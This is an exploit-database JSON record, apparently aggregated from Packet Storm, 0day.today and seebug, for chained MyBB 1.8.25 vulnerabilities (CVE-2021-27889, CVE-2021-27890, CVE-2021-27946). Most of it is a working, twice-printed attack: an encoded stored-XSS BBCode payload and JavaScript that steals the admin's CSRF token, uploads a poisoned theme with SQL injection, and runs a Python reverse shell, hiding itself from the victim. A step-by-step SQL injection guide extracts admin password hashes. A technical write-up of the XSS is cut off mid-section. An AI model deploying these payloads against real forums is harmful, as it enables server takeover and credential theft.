{"id": "PACKETSTORM:161908", "type": "packetstorm", "bulletinFamily": "exploit", "title": "MyBB 1.8.25 Remote Command Execution", "description": "", "published": "2021-03-22T00:00:00", "modified": "2021-03-22T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://packetstormsecurity.com/files/161908/MyBB-1.8.25-Remote-Command-Execution.html", "reporter": "SivertPL", "references": [], "cvelist": ["CVE-2021-27889", "CVE-2021-27890"], "lastseen": "2021-03-22T15:33:24", "viewCount": 167, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27889", "CVE-2021-27890"]}, {"type": "exploitdb", "idList": ["EDB-ID:49696", "EDB-ID:49699"]}, {"type": "githubexploit", "idList": ["828FD9AF-C840-5F1E-97D2-D89A4D7B5A82"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161918"]}, {"type": "seebug", "idList": ["SSV:99162"]}, {"type": "thn", "idList": ["THN:3152B45B015211515D21C5C8A05763F5"]}, {"type": "zdt", "idList": ["1337DAY-ID-36006", "1337DAY-ID-36010"]}], "rev": 4}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-27889", "CVE-2021-27890"]}, {"type": "exploitdb", "idList": ["EDB-ID:49696", "EDB-ID:49699"]}, {"type": "githubexploit", "idList": ["828FD9AF-C840-5F1E-97D2-D89A4D7B5A82"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161918"]}, {"type": "seebug", "idList": ["SSV:99162"]}, {"type": "thn", "idList": ["THN:3152B45B015211515D21C5C8A05763F5"]}, {"type": "zdt", "idList": ["1337DAY-ID-36006", "1337DAY-ID-36010"]}]}, "exploitation": null, "vulnersScore": 6.5}, "sourceHref": "https://packetstormsecurity.com/files/download/161908/mybb1825-exec.txt", "sourceData": "`# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution \n# Exploit Author: SivertPL (kroppoloe@protonmail.ch) \n# Date: 19.03.2021 \n# Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation 
in eval(). \n# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip \n# CVE: CVE-2021-27889, CVE-2021-27890 \n \nReference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \n \nThe exploit requires the target administrator to have a valid ACP session. \n \nProof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ \n \nGuide: \n \n1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it. \n \nPlease replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target. \n \ndocument.write('<script src=http://localhost:8000/second_stage.js></script>'); \n \n2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment. \n \nYou can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/ \n \n3) Put the resulting encoded payload in the nested autourl vulnerability vector: \n \n[img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img] \n \n4) The final payload should look like this: \n \n[img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img] \n \n5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported. \nOnce the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP. 
\n\nAfter the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.\n\n6) Enjoy your RCE! For educational purposes only.\n\n*/\n\nconst REVERSE_SHELL_IP = \"localhost\";\nconst REVERSE_SHELL_PORT = 5554;\n\nconst PAYLOAD_XML_NAME = \"payload\";\nconst PAYLOAD_XML_VERSION = \"1821\";\n\nconst XML_PROLOG = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\";\n\nconst SHELL_PAYLOAD = \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\" + REVERSE_SHELL_IP + \"\\\",\" + REVERSE_SHELL_PORT + \"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\";\nconst SQL_PAYLOAD = \"') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\\\'\" + btoa(SHELL_PAYLOAD) + \"\\\\'))}' from mybb_templates -- \";\n\n// Trigger the actual vulnerability, force cache reload.\n// Stage: Final\nfunction trigger() {\nvar request = new XMLHttpRequest();\n\nrequest.open('GET', '/index.php');\nrequest.send();\n}\n\n// Poison the cache.
\n// Stage: 6\nfunction set_as_default(token, tid) {\n\nvar request = new XMLHttpRequest();\n\nrequest.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);\n\nrequest.onload = function() { trigger(); };\n\nrequest.send();\n}\n\n// Get the TID of the downloaded theme payload\n// Stage: 5\nfunction get_payload_tid(token) {\nvar request = new XMLHttpRequest();\n\nrequest.open('GET', '/admin/index.php?module=style-themes');\n\nrequest.responseType = \"document\";\n\nrequest.onload = function() {\n\nvar response = request.response;\n\nvar aTags = response.getElementsByTagName(\"a\");\nvar searchText = \"payload\";\nvar found;\n\nfor (var i = 0; i < aTags.length; i++) {\nif (aTags[i].textContent == searchText) {\nfound = aTags[i];\nbreak;\n}\n}\n\nvar href = found.getAttribute(\"href\");\n\nvar urlParams = new URLSearchParams(href);\n\nvar tid = urlParams.get(\"tid\");\n\nset_as_default(token, tid);\n};\n\nrequest.send();\n\n}\n\n// We pass the actual request to upload the template exploiting the second link of the exploit chain\n// Stage: 4\nfunction upload_template(token) {\n\nvar request = new XMLHttpRequest();\n\nrequest.open('POST', '/admin/index.php?module=style-themes&action=import');\n\nvar data = new FormData();\n\ndata.append('my_post_key', token);\ndata.append('local_file', build_payload(), PAYLOAD_XML_NAME + \".xml\");\ndata.append('import', 0);\ndata.append('url', '');\ndata.append('tid', '1');\ndata.append('name', \"payload\");\ndata.append(\"version_compat\", 1);\ndata.append(\"import_stylesheets\", 1);\ndata.append(\"import_templates\", 1);\n\nrequest.onload = function() {\n// After uploading the template, set it as default to poison the cache\nget_payload_tid(token);\n};\n\nrequest.send(data);\n}\n\n// Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.
\n// Stage: 3\nfunction build_payload() {\nvar xmlDom = document.implementation.createDocument(\"\", \"\", null);\n\nvar theme = xmlDom.createElement(\"theme\");\ntheme.setAttribute(\"name\", PAYLOAD_XML_NAME);\ntheme.setAttribute(\"version\", PAYLOAD_XML_VERSION);\n\nvar properties = xmlDom.createElement(\"properties\");\ntheme.appendChild(properties);\n\nvar template_set = xmlDom.createElement(\"templateset\");\ntemplate_set.innerHTML = SQL_PAYLOAD;\nproperties.appendChild(template_set);\n\nxmlDom.appendChild(theme);\n\nvar serialized = new XMLSerializer().serializeToString(xmlDom);\n\nvar result = XML_PROLOG + serialized;\nvar file = new File([result], PAYLOAD_XML_NAME);\n\nreturn file;\n}\n\n// Acquire the anti-CSRF token\n// Stage: 2\nfunction acquire_token(request) {\n\nvar response = request.response;\nvar token = response.getElementsByName(\"my_post_key\")[0].value;\n\nif(token == null) {\n/* ACP Session either expired or wasn't established to begin with */\nreturn;\n}\n\n// We have acquired the anti-CSRF token now.\nupload_template(token);\n}\n\n// ACP Code Execution\n// Stage: 1\nfunction exec_acp() {\n\nvar request = new XMLHttpRequest();\n\nrequest.open('GET', 'admin/index.php?module=style-themes&action=import');\nrequest.responseType = \"document\";\n\nrequest.onload = function() {\nacquire_token(request);\n};\n\nrequest.send();\n}\n\n// We hide the payload, to raise less suspicion\n// Stage: 0\nfunction hide() {\n\nvar getAll = document.querySelectorAll(\"[src*='http://xyzsomething.com/image?)<a href=']\");\n\ngetAll.forEach(element => {\nvar pNode = element.parentNode.innerText = \"lmao whatever you say\";\n});\n\n}\n\n// Entry point of the exploit\nfunction start() {\nhide();\nexec_acp();\n}\n\nstart();\n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646005718}}
{"zdt": [{"lastseen": "2021-10-01T00:49:11", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T00:00:00", "type": "zdt", "title": "MyBB 1.8.25 - Chained Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27890"], "modified": "2021-03-22T00:00:00", "id": "1337DAY-ID-36006", "href": "https://0day.today/exploit/description/36006", "sourceData": "# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution\r\n# Exploit Author: SivertPL (kroppoloe@protonmail.ch)\r\n# Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval().\r\n# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip\r\n# CVE: CVE-2021-27889, CVE-2021-27890\r\n\r\nReference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums\r\n\r\nThe exploit requires the target administrator to have a valid ACP session.\r\n\r\nProof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ\r\n\r\nGuide:\r\n\r\n1) In order 
to escape various checks, the XSS has to download this .js file from an external server, and then execute it.\r\n\r\nPlease replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target.\r\n\r\ndocument.write('<script src=http://localhost:8000/second_stage.js></script>');\r\n\r\n2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment.\r\n\r\nYou can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/\r\n\r\n3) Put the resulting encoded payload in the nested autourl vulnerability vector:\r\n\r\n[img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]\r\n\r\n4) The final payload should look like this:\r\n\r\n[img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]\r\n\r\n5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported.\r\nOnce the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP.\r\n\r\nAfter the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.\r\n\r\n6) Enjoy your RCE! 
For educational purposes only.\r\n\r\n*/\r\n\r\nconst REVERSE_SHELL_IP = \"localhost\";\r\nconst REVERSE_SHELL_PORT = 5554;\r\n\r\nconst PAYLOAD_XML_NAME = \"payload\";\r\nconst PAYLOAD_XML_VERSION = \"1821\";\r\n\r\nconst XML_PROLOG = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\";\r\n\r\nconst SHELL_PAYLOAD = \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\" + REVERSE_SHELL_IP + \"\\\",\" + REVERSE_SHELL_PORT + \"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\";\r\nconst SQL_PAYLOAD = \"') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\\\'\" + btoa(SHELL_PAYLOAD) + \"\\\\'))}' from mybb_templates -- \";\r\n\r\n// Trigger the actual vulnerability, force cache reload.\r\n// Stage: Final\r\nfunction trigger() {\r\nvar request = new XMLHttpRequest();\r\n\r\nrequest.open('GET', '/index.php');\r\nrequest.send();\r\n}\r\n\r\n// Poison the cache.\r\n// Stage: 6\r\nfunction set_as_default(token, tid) {\r\n\r\nvar request = new XMLHttpRequest();\r\n\r\nrequest.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);\r\n\r\nrequest.onload = function() { trigger(); };\r\n\r\nrequest.send();\r\n}\r\n\r\n// Get the TID of the downloaded theme payload\r\n// Stage: 5\r\nfunction get_payload_tid(token) {\r\nvar request = new XMLHttpRequest();\r\n\r\nrequest.open('GET', '/admin/index.php?module=style-themes');\r\n\r\nrequest.responseType = \"document\";\r\n\r\nrequest.onload = function() {\r\n\r\nvar response = request.response;\r\n\r\nvar aTags = response.getElementsByTagName(\"a\");\r\nvar searchText = \"payload\";\r\nvar found;\r\n\r\nfor (var i = 0; i < aTags.length; i++) {\r\nif (aTags[i].textContent == searchText) {\r\nfound = aTags[i];\r\nbreak;\r\n}\r\n}\r\n\r\nvar href = found.getAttribute(\"href\");\r\n\r\nvar urlParams = new URLSearchParams(href);\r\n\r\nvar tid = 
urlParams.get(\"tid\");\r\n\r\nset_as_default(token, tid);\r\n};\r\n\r\nrequest.send();\r\n\r\n}\r\n\r\n// We pass the actual request to upload the template exploiting the second link of the exploit chain\r\n// Stage: 4\r\nfunction upload_template(token) {\r\n\r\nvar request = new XMLHttpRequest();\r\n\r\nrequest.open('POST', '/admin/index.php?module=style-themes&action=import');\r\n\r\nvar data = new FormData();\r\n\r\ndata.append('my_post_key', token);\r\ndata.append('local_file', build_payload(), PAYLOAD_XML_NAME + \".xml\");\r\ndata.append('import', 0);\r\ndata.append('url', '');\r\ndata.append('tid', '1');\r\ndata.append('name', \"payload\");\r\ndata.append(\"version_compat\", 1);\r\ndata.append(\"import_stylesheets\", 1);\r\ndata.append(\"import_templates\", 1);\r\n\r\nrequest.onload = function() {\r\n// After uploading the template, set it as default to poison the cache\r\nget_payload_tid(token);\r\n};\r\n\r\nrequest.send(data);\r\n}\r\n\r\n// Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.\r\n// Stage: 3\r\nfunction build_payload() {\r\nvar xmlDom = document.implementation.createDocument(\"\", \"\", null);\r\n\r\nvar theme = xmlDom.createElement(\"theme\");\r\ntheme.setAttribute(\"name\", PAYLOAD_XML_NAME);\r\ntheme.setAttribute(\"version\", PAYLOAD_XML_VERSION);\r\n\r\nvar properties = xmlDom.createElement(\"properties\");\r\ntheme.appendChild(properties);\r\n\r\nvar template_set = xmlDom.createElement(\"templateset\");\r\ntemplate_set.innerHTML = SQL_PAYLOAD;\r\nproperties.appendChild(template_set);\r\n\r\nxmlDom.appendChild(theme);\r\n\r\nvar serialized = new XMLSerializer().serializeToString(xmlDom);\r\n\r\nvar result = XML_PROLOG + serialized;\r\nvar file = new File([result], PAYLOAD_XML_NAME);\r\n\r\nreturn file;\r\n}\r\n\r\n// Acquire the anti-CSRF token\r\n// Stage: 2\r\nfunction acquire_token(request) {\r\n\r\nvar response = request.response;\r\nvar token = 
response.getElementsByName(\"my_post_key\")[0].value;\r\n\r\nif(token == null) {\r\n/* ACP Session either expired or wasn't established to begin with */\r\nreturn;\r\n}\r\n\r\n// We have acquired the anti-CSRF token now.\r\nupload_template(token);\r\n}\r\n\r\n// ACP Code Execution\r\n// Stage: 1\r\nfunction exec_acp() {\r\n\r\nvar request = new XMLHttpRequest();\r\n\r\nrequest.open('GET', 'admin/index.php?module=style-themes&action=import');\r\nrequest.responseType = \"document\";\r\n\r\nrequest.onload = function() {\r\nacquire_token(request);\r\n};\r\n\r\nrequest.send();\r\n}\r\n\r\n// We hide the payload, to raise less suspicion\r\n// Stage: 0\r\nfunction hide() {\r\n\r\nvar getAll = document.querySelectorAll(\"[src*='http://xyzsomething.com/image?)<a href=']\");\r\n\r\ngetAll.forEach(element => {\r\nvar pNode = element.parentNode.innerText = \"lmao whatever you say\";\r\n});\r\n\r\n}\r\n\r\n// Entry point of the exploit\r\nfunction start() {\r\nhide();\r\nexec_acp();\r\n}\r\n\r\nstart();\n\n# 0day.today [2021-10-01] #", "sourceHref": "https://0day.today/exploit/36006", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-01T00:49:07", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-23T00:00:00", "type": "zdt", "title": "MyBB 1.8.25 - Poll Vote Count SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27946"], "modified": "2021-03-23T00:00:00", "id": "1337DAY-ID-36010", "href": "https://0day.today/exploit/description/36010", "sourceData": "# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection\r\n# Exploit Author: SivertPL ([email\u00a0protected])\r\n# Description: Lack of sanitization in the \"votes[]\" parameter in \"Edit Poll\" causes a second-order semi-blind SQL Injection that is triggered when performing a \"Move/Copy\" operation on the thread.\r\n# Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip\r\n# CVE: CVE-2021-27946\r\n\r\nReferences:\r\n\r\n 1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \r\n 2) https://vuldb.com/?id.171307\r\n 3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch \r\n\r\nIn order to trigger the vulnerability, you must have permission to edit polls. 
\r\nModerators and administrators can usually do it, but in some configurations regular users can do it as well.\r\n\r\nIn case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash.\r\n\r\nOtherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary injections automatically, and send the resulting hashes to your server.\r\n\r\nThis is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of a very determined attacker who combines it with CVE-2021-27889 and an automated JavaScript-based SQL injector.\r\n\r\nThis vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used.\r\nIn such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash).\r\n\r\nGuide:\r\n\r\n1) Make a thread with a public poll, with multiple choices.\r\n\r\n2) Vote on at least one choice.\r\n\r\n3) Go to the \"Edit poll\" section of the poll.\r\n\r\n4) Place the following payload in the \"vote count\" input (any entry within the votes[] parameter in the resulting POST request).\r\n\r\n 1','2',ascii((select version())),'0','0','1','1') -- -a\r\n\r\n5) Save the poll.\r\n\r\n6) Perform a \"Move/Copy\" operation on the thread, moving it to a different forum, or making a copy in the same forum.\r\n\r\nThis is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect.\r\n\r\n7) Go to the copied/moved version of the thread (you should be redirected there automatically).\r\n\r\n8) Go to the \"Show Results\" section of the poll.\r\n\r\n9) The total vote count under the poll is our 64-bit unsigned integer covert channel to retrieve information from the ascii select 
query. \r\n\r\nSince this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()).\r\nOther parameters in the INSERT query that we are injecting into are either too small, or unfeasible. \r\nUnsigned integer provides enough space to extract required data when enough requests are made.\r\n\r\nIn this case, the number is the ASCII code of the first character of the result of the injected select version() query.\r\nThis way we can transfer the output through this covert channel, one character at a time.\r\n\r\nIn order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int.\r\n\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 2, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 3, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 4, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 5, 1))),'0','0','1','1') -- -a\r\n\r\n... etc.\r\n\r\nThis will send the ASCII codes of every char of the hashed password through the integer covert channel.\r\n\r\n\r\n10) After sending enough requests, you should have the hashed admin password. 
Repeat the entire process to acquire the salt.\n\n# 0day.today [2021-10-01] #", "sourceHref": "https://0day.today/exploit/36010", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T15:19:52", "description": "# Mybb-XSS_SQL_RCE-POC\r\nMybb associate CVE-2021-27890 & CVE-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T06:00:31", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Mybb", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27890"], "modified": "2021-05-08T06:58:30", "id": "828FD9AF-C840-5F1E-97D2-D89A4D7B5A82", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "seebug": [{"lastseen": "2021-07-24T16:03:14", "description": "# MyBB Remote Code Execution Chain\n\nBY SIMON SCANNELL & CARL SMITH\n\n\n\n*Today SonarSource is pleased to share with you a guest contribution to our [Code Security blog series](https://blog.sonarsource.com/tag/security). 
The following blog post is authored by Simon Scannell and Carl Smith -two independent security researchers- joining us in sharing their findings of real world vulnerabilities and how they directly relate to Code Security. Over to you Simon and Carl!*\n\nLike all IT security enthusiasts, we love to grow our knowledge by looking through a variety of applications, and taking up some contests such as playing *capture the flag*. Lately, we decided to look at forum software to create a CTF challenge and detected a chain of serious vulnerabilities in MyBB, one of the most popular open source bulletin boards. In a followup to SonarSource\u2019s recent series of posts about the [challenges](https://blog.sonarsource.com/regular-expressions-present-challenges) of [regular](https://blog.sonarsource.com/setting-the-right-regex-boundaries-is-important) [expressions](https://blog.sonarsource.com/crafting-regexes-to-avoid-stack-overflows), we would like to share our code vulnerability findings in MyBB that are based on defective regexes.\n\n## Impact\n\nMyBB forums with versions between and including **1.8.16** and **1.8.25** are affected by two vulnerabilities we discovered that can be chained together to achieve Remote Code Execution (RCE) without any prior access to a privileged account on default MyBB-configurations. The first vulnerability (Nested Auto URL persistent XSS \u2014 CVE-2021-27889) reported by us was an issue in the MyBB rendering process that enabled any unprivileged forum user of a MyBB board to embed Stored XSS payloads into threads, posts and even private messages. \n\nThe second vulnerability (Theme properties SQL injection \u2014 CVE-2021-27890) that was reported by us was an SQL injection which led to RCE and could be triggered by any user with an active session in the administrator dashboard of a MyBB forum. 
\n\nA sophisticated attacker could develop an exploit for the Stored XSS vulnerability and then send a private message to a targeted administrator of a MyBB board. As soon as the administrator opens the private message, on his own trusted forum, the exploit triggers. An RCE vulnerability is automatically exploited in the background and leads to a full takeover of the targeted MyBB forum.\n\n## Technical Details\n\n\n\n### Persistent XSS in Nested Auto URL (CVE-2021-27889)\n\nModern forum software such as MyBB commonly enables unprivileged users to create posts or private messages containing images, videos, headlines, lists and so on. \n\nThis feature must be carefully implemented, as untrusted users could abuse it to modify the contents of the forum in undesired ways if the constraints of this feature are not strict enough. Worst case, a user could gain the ability to inject arbitrary JavaScript code into the HTML documents served by the trusted forum.\n\nIn our experience, we have observed two approaches to implement this feature:\n\n1. Allow users to submit HTML tags and apply an allow or deny list to determine whether the input is sane and safe to display to other users.\n2. Use an existing or custom message format, such as Markdown for example, to create sane HTML outputs from inputs.\n\nBoth approaches come with their respective advantages and disadvantages. 
MyBB utilizes the second approach in its rendering process, with a custom implementation of its own *MyCodes*.\n\nHere are two examples of what such a *MyCode* looks like and how it is converted:\n\n```\n[url]https://blog.sonarsource.com[/url]\n = <a href=\"https://blog.sonarsource.com\">https://blog.sonarsource.com</a>\n[b]Hello, World![/b] \n = <strong>Hello, World!</strong>\n```\n\nWhenever a user creates, for example, a private message containing such codes, the MyBB parser encodes the entire input and then utilizes a regex to find and replace all MyCodes with their respective HTML code.\n\nProblems in such parsers can occur when the regex patterns used to find and replace e.g. MyCodes are too relaxed, which could lead to nested HTML tags being rendered, as is the case with the XSS we are breaking down here.\n\nAnother, less explicit, step of the MyBB rendering process is to automatically detect URLs which were not wrapped with the [URL] MyCode and to convert them into HTML links. The following snippet shows how the $message variable is passed to the mycode_auto_url() method of the renderer class:\n\n**mybb/inc/class_parser.php**\n\n```\n 525 if($mybb->settings['allowautourl'] == 1)\n 526 {\n 527 $message = $this->mycode_auto_url($message);\n 528 }\n 529 \n 530 return $message;\n```\n\nThe $message variable in line 527 contains the already rendered HTML result of the user-supplied message and thus must be carefully handled so that no HTML tags or attributes could be corrupted. 
The condition for this is that only URLs that are not part of an HTML tag are allowed to be converted into <a> tags.\n\nMyBB utilized the following regex to try to securely parse only URLs that are not part of an HTML tag (the regex was simplified by stripping away all parts that were not relevant for understanding this vulnerability):\n\n**mybb/inc/class_parser.php**\n\n```\n1618 $message = preg_replace_callback(\n \"#<a\\\\s[^>]*>.*?</a>|([\\s\\(\\)\\[\\>])(www|ftp)\\.([\\w|\\d\\-./]+)#ius\", \n array($this, 'mycode_auto_url_callback'), \n $message);\n```\n\nThe regex is divided by the | character into two alternatives:\n\n1. Match anything between <a> tags (<a\\\\s[^>]*>.*?</a>). In case of such a match, nothing is changed\n2. The URL match must begin with either a whitespace, parentheses or an opening square bracket ([) or a closing angle bracket (>) and is then followed by a URL (this is the simplified part). The logic here is that when a user-supplied MyCode is converted into HTML, although user controlled data can be embedded into an HTML attribute of the resulting HTML tag, it cannot contain any of these characters. \n\nAs an example, when an [img] MyCode is converted to HTML, it could look like this:\n\n```\n[img]http://xyzsomething.com/image.png[/img]\n = <img src=\"http://xyzsomething.com/image.png\" />\n```\n\nWhen such an image tag is constructed, the URL that is going to form the src attribute is stripped of all whitespaces and is HTML and URL encoded. The idea was that these transformations would remove all characters that could be matched by the second alternative of the regex which is used for the auto URL encode. Therefore the second part assumes that the first transformation has already *cleaned* the URL.\n\nHowever, both URL encoding and HTML encoding do not modify parentheses (). 
Thus, it was possible to craft an [img] tag such as the one shown below, which invalidates this assumption and thus confuses the second regex.\n\n```\n[img]http://xyzsomething.com/image?)http://x.com/onerror=alert(1);//[/img]\n```\n\nIn the first step of the rendering process, the following <img> tag would have been created:\n\n```\n<img src=\"http://xyzsomething.com/image?)http://x.com/onerror=alert(1);//\">\n```\n\nIn the next step, the mycode_auto_url() method matches the second URL in the image as it begins with a closing parenthesis which has not been escaped or encoded. The final HTML that is created then looks like this:\n\n```\n<img src=\"http://xyzsomething.com/image?)<a href=\" http:=\"\" x.com=\"\" \n onerror=\"alert(1);//"\" target=\"_blank\" rel=\"noopener\" class=\"mycode_url\">\n```\n\nAs you can see, an <a> tag has been inserted into the existing <img> tag. Since both of these tags contain double quotes, they corrupt each other. Browsers such as Chrome or Firefox are going to construct a final <img> element containing an attacker-controlled onerror event handler. This allows the attacker to execute arbitrary JavaScript code in the browser of a victim who reads the malicious post or private message.\n\n### SQL 